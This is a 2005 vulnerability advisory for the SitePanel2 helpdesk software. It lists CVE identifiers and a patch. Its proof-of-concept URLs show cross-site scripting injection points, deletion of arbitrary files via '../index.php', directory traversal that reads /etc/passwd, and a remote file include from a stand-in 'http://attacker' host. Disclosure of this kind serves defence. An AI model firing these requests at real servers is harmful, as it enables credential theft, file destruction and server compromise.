Are you looking to have your application properly secured by an experienced professional? Contact us today for a free private consultation. We specialize in web application security, mobile security, and also offer general consultation services. Click here for more information regarding all of our security services.
SitePanel2 Multiple Vulnerabilities
Vendor: Morgan Harvey
Product: SitePanel2
Version: <= 2.6.1
Website: http://www.sitepanel2.com/
BID: 13481
CVE: CVE-2005-1444 CVE-2005-1445 CVE-2005-1446 CVE-2005-1447
OSVDB: 16262 16263 16264 16265 16266 16267 16268
SECUNIA: 15213
PACKETSTORM: 38637
Description:
SitePanel2 is a helpdesk / trouble ticket / support system used by businesses and individuals alike. There are a number of vulnerabilities in SitePanel2, some of which are fairly serious. If an attacker is able to successfully exploit these vulnerabilities in SitePanel2 he may be able to successfully compromise user accounts or completely compromise the target web server. A security patch has been released to address these issues and all users are strongly encouraged to upgrade their SitePanel2 installations as soon as possible.


Cross Site Scripting:
Cross site scripting exists in SitePanel2. This vulnerability exists due to user supplied input not being checked properly.

http://host/users/main.php?p=5&do=2&v=177%22%3E[XSS]
http://host/admin/5.php?do=chsev&postid=177&usernamess=test&inadmin=no%22%3E[XSS]
http://host/admin/5.php?do=chsev2&postid=177&usernamess=test&inadmin=no&newsev=4%22%3E[XSS]
http://host/admin/5.php?do=chsev&postid=177%22%3E[XSS]&usernamess=test&inadmin=no
http://host/users/main.php?p=5&do=0&show=closed%22%3E[XSS]
http://host/admin/0.php?do=ratekb&id=11%22%3E[XSS]
http://host/users/main.php?p=6&do=0&v=post&id=11&sec_name=Blah%22%3E[XSS]

This vulnerability could be used to steal cookie based authentication credentials within the scope of the current domain, or render hostile code in a victim's browser.


Arbitrary File Deletion:
I found an arbitrary file deletion issue, which depending on server permissions may allow an attacker to delete any file on the server.

http://host/admin/5.php?do=rmattach&rm=yes&id=../index.php

Even if the server is running as nobody you can still delete any and all attachments you know the name of.


Directory Traversal Vulnerability:
Also, there is a directory traversal vulnerability. An attacker may specify directory traversal sequences when calling the "lang" parameter and include arbitrary files residing on the local machine.

http://host/users/index.php?lang=en.inc/../../../../../../etc/passwd%00

This issue can be used to read arbitrary files, or include and execute arbitrary local files.


Arbitrary File Upload:
Nothing very technical here, but an attacker can upload malicious files such as php scripts when attaching them to a trouble ticket and execute them with the privledges of the target web server.


Arbitrary File Include Vulnerability:
SitePanel2 is prone to both remote and local file include vulnerabilities which may allow for an attacker to execute arbitrary commands on the victim webserver by including malicious files.

http://host/users/main.php?p=http://attacker

Above is an example of how this issue could be exploited. The problem lies in the way the "p" parameter is called. It is clearly not sanatized and can be used to include arbitrary files from a remote location.


Solution:
The developer was contacted some months ago and a new version can be found here http://forum.sitepanel2.com/index.php?showtopic=271


Credits:
James Bercegay of the GulfTech Security Research Team